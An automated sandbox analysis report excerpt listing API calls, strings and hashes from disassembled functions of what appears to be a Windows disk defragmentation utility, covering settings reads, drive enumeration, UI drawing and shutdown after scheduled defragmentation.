• Associated: 0000001D.00000002.2350181256.0000000000599000.00000002.00000001.01000000.00000014.sdmp
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: PrivateProfileString$Find$ByteCloseFileFormatNextSize
                                                                                                                                                                                                                                                                                    • String ID: DefragTime$DefraggedFileCount$LG$TotalDefraggedFileSize$`=$main
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,DefragTime,0047D9D0,?,00000064,?), ref: 0041134A
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,TotalDefraggedFileSize,0047EF74,?,00000064,?), ref: 004113FA
                                                                                                                                                                                                                                                                                    • StrFormatByteSizeW.SHLWAPI(00000000,?,?,?,00000000,?,?,?,?,?,00000000,0000024C), ref: 0041141C
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,DefraggedFileCount,0047EF74,?,00000064,?), ref: 00411452
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000010), ref: 00411474
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00411483
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: PrivateProfileString$Find$ByteCloseFileFormatNextSize
                                                                                                                                                                                                                                                                                    • String ID: DefragTime$DefraggedFileCount$LG$TotalDefraggedFileSize$`=$main
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,00421955), ref: 00419D9A
                                                                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,00421955), ref: 00419DA1
                                                                                                                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00419DB7
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00421955), ref: 00419DC6
                                                                                                                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 00419E04
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00419E13
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00419E24
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseHandle$ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsIconic.USER32(?), ref: 0041F916
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000027,?,00000000), ref: 0041F937
                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000B), ref: 0041F945
                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000C), ref: 0041F94B
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0041F958
                                                                                                                                                                                                                                                                                    • DrawIcon.USER32(?,?,?,?), ref: 0041F989
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MetricsSystem$ClientDrawIconIconicMessageRectSend
                                                                                                                                                                                                                                                                                    • String ID: 8F
                                                                                                                                                                                                                                                                                    • API String ID: 2166663075-180763933
                                                                                                                                                                                                                                                                                    • Opcode ID: cb24d554b556fdc8d671f57bd367dd0002cc258e733202bd551999ba64437650
                                                                                                                                                                                                                                                                                    • Instruction ID: c07e6ffc6c3a7e6482c06200d306031f545548e1037b46c62c472d77c4aae73d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb24d554b556fdc8d671f57bd367dd0002cc258e733202bd551999ba64437650
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE3158712086019FD324DF38C989BABB7E8FB88710F144A2EE19A93290DB74E845CB55
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,00421972), ref: 0041E100
                                                                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00421972), ref: 0041E107
                                                                                                                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041E124
                                                                                                                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 0041E148
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041E14E
                                                                                                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000001,80020003), ref: 0041E16E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                    • API String ID: 107509674-3733053543
                                                                                                                                                                                                                                                                                    • Opcode ID: b491cb2bc98087b98b93889b4cab252affd35304ae06bf2e3e34bcfb05d76a30
                                                                                                                                                                                                                                                                                    • Instruction ID: ff8bdaaac48f1339d689247c0ac3bb4d0c15d19762690cb1fcb66aa4c131ddab
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b491cb2bc98087b98b93889b4cab252affd35304ae06bf2e3e34bcfb05d76a30
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7301FC35644310BFE3109BA8DC49B9B7698BB44B04F40482DFD4DE6191D77499408BDA
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,?,?), ref: 0045A8C2
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 0045A915
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?), ref: 0045A955
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000,?,00000000,00000000,00000001,?,?,?), ref: 0045A9AA
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 0045A9CE
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: DiskFreeSpace$Find$CloseFileFirst
                                                                                                                                                                                                                                                                                    • String ID: %c:\
                                                                                                                                                                                                                                                                                    • API String ID: 281833627-3142399695
                                                                                                                                                                                                                                                                                    • Opcode ID: 451e843c757d912e0df44721ece3a0365b6d60f66d903087e08b2b682d24d5dc
                                                                                                                                                                                                                                                                                    • Instruction ID: 5c1349d2b4a299dbbed6192556f5b370b8187b703f81d55d5c722b9a40b8fb44
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 451e843c757d912e0df44721ece3a0365b6d60f66d903087e08b2b682d24d5dc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A071FBB55057019FD314DF64D988BABB7E4FF98711F008A2EE89A87390E734A848CF56
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00020028,?), ref: 00419CFD
                                                                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00419D04
                                                                                                                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00419D1E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Process$CurrentLookupOpenPrivilegeTokenValue
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3639550587-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 7148b218a58efe162156a67a36f4013a52d7ca8231e1dbe32e75ae0325f5605e
                                                                                                                                                                                                                                                                                    • Instruction ID: f3d016862a4d3342d6fd7035e13c423cea38e9027ddeccfb2464269e0ea5178e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7148b218a58efe162156a67a36f4013a52d7ca8231e1dbe32e75ae0325f5605e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 73015275644301AFE314CFA5DC89B6BB7E8FB88B05F80492CF54DC2290E774D9848B56
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,00000003,?), ref: 0046326C
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000003,?), ref: 00463410
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 0046342D
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                                    • String ID: %s%s\$%s*
                                                                                                                                                                                                                                                                                    • API String ID: 3541575487-790581550
                                                                                                                                                                                                                                                                                    • Opcode ID: 299fa53831f00350431557c8593a3fc536372945f534859870c8437012aa5de1
                                                                                                                                                                                                                                                                                    • Instruction ID: c3493345b0c0ceefe68b50463acd725d1f8c1e028979316797af0ed8e7acec35
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 299fa53831f00350431557c8593a3fc536372945f534859870c8437012aa5de1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC71B5711083809FC720EF64C884A6BB7E5FB89314F444A6EF85997391E734EA45CB57
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00473B49
                                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00473B5E
                                                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(0047CF54), ref: 00473B69
                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00473B85
                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 00473B8C
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 5ae23ef8c9597736f524d82b530ad1912cf66df142059fb024dfe3cae4b4f3e6
                                                                                                                                                                                                                                                                                    • Instruction ID: 5fbb9a2fc2dc4524adccc28e56c0de5744acadb4307870d4d3e04b8eaaabc2f4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ae23ef8c9597736f524d82b530ad1912cf66df142059fb024dfe3cae4b4f3e6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E421E3B8828204DFC700DFA5FC856853BA4FB28329F5040BBE80D87762E77466848F5D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000003.2342650370.00000000005D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 005D0000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_3_5d0000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                                                                                                                                                    • Instruction ID: 7f45a62b763b18ee1db0e3ef6cde993bceb0ffd0ff8c50725b501db6588a7515
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AF06275A50200EFC718DF0AC544CD677F7EB857107654595D4049B3A2D3B0DE45CB70
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(00000000), ref: 0042872A
                                                                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00428751
                                                                                                                                                                                                                                                                                    • #8.OLEAUT32(3401099,0047D9D0,0047D9D0,0047D9D0,0047D9D0,00000000), ref: 00428778
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008022,00000000), ref: 0042878F
                                                                                                                                                                                                                                                                                    • #8.OLEAUT32(3401128,0047D9D0,0047D9D0,0047D9D0,0047D9D0), ref: 004287AA
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008027,00000000), ref: 004287BB
                                                                                                                                                                                                                                                                                    • #8.OLEAUT32(3401127,0047D9D0,0047D9D0,0047D9D0,0047D9D0), ref: 004287D6
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008028,00000000), ref: 004287E7
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 004287F6
                                                                                                                                                                                                                                                                                    • #8.OLEAUT32(3401032,0047D9D0,0047D9D0,0047D9D0,0047D9D0), ref: 00428811
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008023,00000000), ref: 00428822
                                                                                                                                                                                                                                                                                    • #8.OLEAUT32(3401033,0047D9D0,0047D9D0,0047D9D0,0047D9D0), ref: 0042883D
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008024,00000000), ref: 0042884E
                                                                                                                                                                                                                                                                                    • #8.OLEAUT32(3401086,0047D9D0,0047D9D0,0047D9D0,0047D9D0), ref: 00428869
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008025,00000000), ref: 0042887A
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 00428889
                                                                                                                                                                                                                                                                                    • #8.OLEAUT32(10021,0047D9D0,0047D9D0,0047D9D0,0047D9D0), ref: 004288A4
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008026,00000000), ref: 004288B5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$Append$CreateCursorPopup
                                                                                                                                                                                                                                                                                    • String ID: 10021$3401032$3401033$3401086$3401099$3401127$3401128
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041DB30: GetLogicalDrives.KERNEL32 ref: 0041DB47
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041DB30: GetDriveTypeW.KERNEL32(?,?,?,00094658), ref: 0041DB8A
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 0040218F
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004021A2
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041A9B0: SHGetFileInfoW.SHELL32(%SystemRoot%,00000040,000002B4,000002B4,00004011), ref: 0041A9DA
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004021C3
                                                                                                                                                                                                                                                                                    • LoadBitmapW.USER32(00000000,00000090), ref: 0040221B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001208,00000000,?), ref: 0040227F
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000001,00000000), ref: 00402370
                                                                                                                                                                                                                                                                                      • Part of subcall function 00402590: SendMessageW.USER32(?,00000400,00000000,00000000), ref: 004025C2
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000405,00000001,00000000), ref: 004023B9
                                                                                                                                                                                                                                                                                      • Part of subcall function 00402660: SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00402692
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$BitmapDriveDrivesFileInfoLoadLogicalType
                                                                                                                                                                                                                                                                                    • String ID: 3402003$3402041$3402043$3402046$3402047$3402048$8F$CPUIdleTime$CPUUsageExceed$DefragmentedFiles$DiskDefrag\AutoDefragmention$LastDefragmention$tG
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,20000000,?,00000000,?,?,00427EC2,BB40E64E), ref: 0041B4C2
                                                                                                                                                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,VSS,00000034,?,?,00000000,?,?,00427EC2,BB40E64E), ref: 0041B4DD
                                                                                                                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00427EC2,BB40E64E), ref: 0041B4EA
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: OpenService$CloseHandleManager
                                                                                                                                                                                                                                                                                    • String ID: 0N$VSS
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetComboBoxInfo.USER32 ref: 00416520
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 0041654D
                                                                                                                                                                                                                                                                                    • GetMapMode.GDI32(?,00000000), ref: 00416561
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0041658E
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 004165AA
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004165D5
                                                                                                                                                                                                                                                                                    • OpenThemeData.UXTHEME(?,COMBOBOX,?,00FFFFFF,00000000,00000000), ref: 00416607
                                                                                                                                                                                                                                                                                    • DrawThemeBackground.UXTHEME(00000000,?,00000005,00000003,?,00000000), ref: 00416652
                                                                                                                                                                                                                                                                                    • DrawThemeBackground.UXTHEME(00000000,?,00000001,00000001,?,00000000), ref: 0041666C
                                                                                                                                                                                                                                                                                    • CloseThemeData.UXTHEME(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00416673
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0041668C
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004166A3
                                                                                                                                                                                                                                                                                    • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 004167D1
                                                                                                                                                                                                                                                                                      • Part of subcall function 00416DD0: CopyRect.USER32(?,?), ref: 00416E1C
                                                                                                                                                                                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 0041681A
                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 0041683E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: RectTheme$MessageSend$BackgroundCompatibleCopyCreateDataDraw$BitmapClientCloseComboFrameInfoModeOpen
                                                                                                                                                                                                                                                                                    • String ID: 4$8F$COMBOBOX
                                                                                                                                                                                                                                                                                    • API String ID: 3327461832-961196532
                                                                                                                                                                                                                                                                                    • Opcode ID: f4382f38c21f4a5feac0cb5c973d886d581c1a15e61b57e088f077fda26ce5f3
                                                                                                                                                                                                                                                                                    • Instruction ID: 20267cedc47a1196732836afe1a8f8ceed4fa11fcf58e3e8436092e3fc6905d6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4382f38c21f4a5feac0cb5c973d886d581c1a15e61b57e088f077fda26ce5f3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BC138B1508300AFD314DF65C985FABB7E8BF88704F008A1EF58997291DB74E944CB96
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(0047D9D0,00001037,00000000,00000000), ref: 004322A8
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004322BC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000101E,00000001,0000FFFE), ref: 00432329
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041D2E0: #2.OLEAUT32(80000001,DiskDefrag\Setting Option\Optimize\OptimizeList,?,?,?,?,00427EC2,BB40E64E), ref: 0041D36A
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041D2E0: #9.OLEAUT32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 0041D397
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,?), ref: 00432523
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402006$3402028$3402029$3402030$3402031$3402032$3402033$3402034$3402035$3402036$3402037$8F$`=
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-3242431549
                                                                                                                                                                                                                                                                                    • Opcode ID: 9743f72da57c074d58d316d1bd28a9e36e8f97539fd99808d5436539a86e7788
                                                                                                                                                                                                                                                                                    • Instruction ID: 1f5745e592a7c845df3e12826af7c739e18eef66d9bd278cacb692334ad6c886
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9743f72da57c074d58d316d1bd28a9e36e8f97539fd99808d5436539a86e7788
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1A194B0B50301ABD310AF658D82FAE73A5AF48B04F10491FFA5EB76D1D7A8BD00965D
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 004217C5
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 0042187C
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001028,00000000,00000000), ref: 00421890
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 004218A6
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 004218BC
                                                                                                                                                                                                                                                                                      • Part of subcall function 00421580: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,004217B6,?,BB40E64E), ref: 004215AC
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004218F0
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CountRedrawTickWindow
                                                                                                                                                                                                                                                                                    • String ID: 3401097$8F$ScheduleStart$`=
                                                                                                                                                                                                                                                                                    • API String ID: 1016491994-1295084991
                                                                                                                                                                                                                                                                                    • Opcode ID: 059351e3aaae428ad539f55a8dcfe394caba1a022192f3b5fcbeae5e242c694e
                                                                                                                                                                                                                                                                                    • Instruction ID: a2f7d2ab4a79c621e2b3341a28b2bdd177a5bb8c7450e01432b01053e343f094
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 059351e3aaae428ad539f55a8dcfe394caba1a022192f3b5fcbeae5e242c694e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2FB117717003119BC720EF64DCC5FAA77A5AF94710F50493EF9099B2E1DB78A844CBAA
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetObjectW.GDI32(?,0000005C,?), ref: 0040AEFA
                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(?,?,00000048), ref: 0040AF5E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001D.00000002.2349699026.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Object
                                                                                                                                                                                                                                                                                    • String ID: CharSet$ClipPrecision$Escapement$Italic$Name$Orientation$OutPrecision$PitchAndFamily$Quality$Size$StrikeOut$Underline$Weight
                                                                                                                                                                                                                                                                                    • API String ID: 2936123098-848768055
                                                                                                                                                                                                                                                                                    • Opcode ID: 581e2151a43bffb8372fa4f7334b51b32000fb86fe427fbed1d6e470a93a997b
                                                                                                                                                                                                                                                                                    • Instruction ID: 678cc5ad66024a4e3a2d6689a74d43ebfb952ff3fe0b92c748617c9598e0b8bb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 581e2151a43bffb8372fa4f7334b51b32000fb86fe427fbed1d6e470a93a997b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E021371508740DFD360DF61C984B5BB7F9EB88304F108A2EF98A87291D778A944CFA6
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GdipGetImagePixelFormat.GDIPLUS(?,?), ref: 00401593
                                                                                                                                                                                                                                                                                    • GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 004015F2
                                                                                                                                                                                                                                                                                    • GdipGetImageWidth.GDIPLUS(?,?,?,?,?,?), ref: 00401613
                                                                                                                                                                                                                                                                                    • GdipGetImagePaletteSize.GDIPLUS(?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0040165A
                                                                                                                                                                                                                                                                                    • GdipGetImagePalette.GDIPLUS(?,00000008,?,80070057,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 004016CF
                                                                                                                                                                                                                                                                                    • GdipBitmapLockBits.GDIPLUS(?,?,00000001,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0040177B
